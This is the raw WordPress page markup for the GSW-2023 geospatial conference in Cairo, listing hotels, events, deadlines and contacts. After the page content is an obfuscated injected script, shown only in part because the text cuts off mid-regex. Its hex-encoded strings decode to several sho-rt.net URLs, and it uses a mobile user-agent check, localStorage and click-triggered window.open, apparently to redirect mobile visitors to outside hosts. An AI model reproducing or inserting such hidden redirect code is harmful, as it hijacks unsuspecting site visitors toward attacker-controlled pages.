css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251674466{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 